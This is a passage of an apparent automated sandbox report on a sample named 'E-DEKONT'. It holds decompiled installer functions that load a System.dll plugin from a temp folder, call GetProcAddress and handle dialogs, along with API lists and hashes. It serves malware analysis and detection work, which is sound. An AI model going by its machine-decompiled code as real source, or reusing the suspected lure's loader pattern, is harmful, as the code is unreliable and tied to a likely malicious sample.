                                                                            0x00402950
                                                                            0x0040295d
                                                                            0x00402963
                                                                            0x00402975
                                                                            0x00402975
                                                                            0x0040297b
                                                                            0x0040297b
                                                                            0x00402986
                                                                            0x00402987
                                                                            0x0040298b
                                                                            0x0040298f
                                                                            0x00402995
                                                                            0x00402995
                                                                            0x0040299c
                                                                            0x00402245
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                            • GlobalFree.KERNEL32(?), ref: 00402950
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                                            • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                                            • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                                            • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 88%
                                                                            			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll");
					}
				} else {
					E00402C15(1);
					 *0x40add0 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061E2(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E55(_t34, _t34) >= 0) {
						_t14 = E00405E26(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsx82F6.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                            0x00402592
                                                                            0x00402592
                                                                            0x00402592
                                                                            0x00402597
                                                                            0x0040259a
                                                                            0x0040259d
                                                                            0x004025a2
                                                                            0x004025a4
                                                                            0x004025c4
                                                                            0x00402602
                                                                            0x004025c6
                                                                            0x004025c8
                                                                            0x004025e2
                                                                            0x004025ed
                                                                            0x004025ed
                                                                            0x004025a6
                                                                            0x004025a8
                                                                            0x004025ad
                                                                            0x004025bb
                                                                            0x004025be
                                                                            0x00402607
                                                                            0x0040260a
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x00402610
                                                                            0x00402619
                                                                            0x0040261b
                                                                            0x0040263a
                                                                            0x004015b4
                                                                            0x004015b6
                                                                            0x00000000
                                                                            0x004015bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040261b
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp$C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll
                                                                            • API String ID: 3109718747-3759672397
                                                                            • Opcode ID: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
                                                                            • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                            • Opcode Fuzzy Hash: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
                                                                            • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 85%
                                                                            			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                                            0x100022e4
                                                                            0x100022e8
                                                                            0x100022f3
                                                                            0x100022f3
                                                                            0x100022fa
                                                                            0x100022ff
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002303
                                                                            0x10002306
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1000230b
                                                                            0x10002316
                                                                            0x10002326
                                                                            0x00000000
                                                                            0x1000231d
                                                                            0x1000231f
                                                                            0x10002335
                                                                            0x00000000
                                                                            0x10002335
                                                                            0x1000230d
                                                                            0x1000230d
                                                                            0x10002336
                                                                            0x10002336
                                                                            0x10002338
                                                                            0x1000233c
                                                                            0x1000233c
                                                                            0x1000233f
                                                                            0x1000233f
                                                                            0x10002347
                                                                            0x1000234e
                                                                            0x10002351
                                                                            0x10002410
                                                                            0x10002411
                                                                            0x1000241c
                                                                            0x10002446
                                                                            0x10002446
                                                                            0x1000242c
                                                                            0x10002438
                                                                            0x1000242e
                                                                            0x1000242e
                                                                            0x1000242e
                                                                            0x00000000
                                                                            0x10002357
                                                                            0x10002357
                                                                            0x00000000
                                                                            0x1000235e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002366
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002374
                                                                            0x10002376
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002397
                                                                            0x1000239d
                                                                            0x100023a0
                                                                            0x100023a2
                                                                            0x100023b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1000237f
                                                                            0x10002384
                                                                            0x10002387
                                                                            0x10002388
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100023be
                                                                            0x100023c4
                                                                            0x100023c5
                                                                            0x100023c8
                                                                            0x100023c9
                                                                            0x100023cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100023d7
                                                                            0x100023da
                                                                            0x100023e6
                                                                            0x100023e8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100023f4
                                                                            0x10002400
                                                                            0x10002403
                                                                            0x10002405
                                                                            0x10002408
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002357
                                                                            0x10002351
                                                                            0x1000232b
                                                                            0x10002330
                                                                            0x00000000
                                                                            0x10002330

                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 4216380887-0
                                                                            • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                            • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                            • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                            • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                            0x10001619
                                                                            0x10001625
                                                                            0x10001632
                                                                            0x10001639
                                                                            0x10001642
                                                                            0x1000164e

                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                            0x00401d63
                                                                            0x00401d6a
                                                                            0x00401d99
                                                                            0x00401da1
                                                                            0x00401da8
                                                                            0x00401da8
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                            • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
                                                                            • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                                            • Opcode Fuzzy Hash: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
                                                                            • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00404AA2(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004062A4(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004062A4(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004062A4(_t44, _t50, 0x42d248, 0x42d248, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d248) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433eb8, _a4, 0x42d248);
			}



















                                                                            0x00404aab
                                                                            0x00404ab0
                                                                            0x00404ab8
                                                                            0x00404ab9
                                                                            0x00404ac6
                                                                            0x00404ace
                                                                            0x00404acf
                                                                            0x00404ad1
                                                                            0x00404ad3
                                                                            0x00404ad5
                                                                            0x00404ad8
                                                                            0x00404ad8
                                                                            0x00404adf
                                                                            0x00404ae5
                                                                            0x00404ae5
                                                                            0x00404aec
                                                                            0x00404af3
                                                                            0x00404af6
                                                                            0x00404af9
                                                                            0x00404af9
                                                                            0x00404afd
                                                                            0x00404b0d
                                                                            0x00404b0f
                                                                            0x00404b12
                                                                            0x00404abb
                                                                            0x00404abb
                                                                            0x00404ac2
                                                                            0x00404ac2
                                                                            0x00404b1a
                                                                            0x00404b25
                                                                            0x00404b3b
                                                                            0x00404b4c
                                                                            0x00404b68

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                            • wsprintfW.USER32 ref: 00404B4C
                                                                            • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                                            • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                                            • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                                            • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405BFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405BFE(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B80(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                                            0x00405c07
                                                                            0x00405c0e
                                                                            0x00405c11
                                                                            0x00405c13
                                                                            0x00405c19
                                                                            0x00405c31
                                                                            0x00405c53
                                                                            0x00000000
                                                                            0x00405c39
                                                                            0x00405c3b
                                                                            0x00405c3c
                                                                            0x00405c3f
                                                                            0x00405c40
                                                                            0x00405c49
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c4c
                                                                            0x00405c4f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c4f
                                                                            0x00000000
                                                                            0x00405c3c
                                                                            0x00405c28
                                                                            0x00000000
                                                                            0x00405c29

                                                                            APIs
                                                                            • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405C0C
                                                                            • CharNextW.USER32(00000000), ref: 00405C11
                                                                            • CharNextW.USER32(00000000), ref: 00405C29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
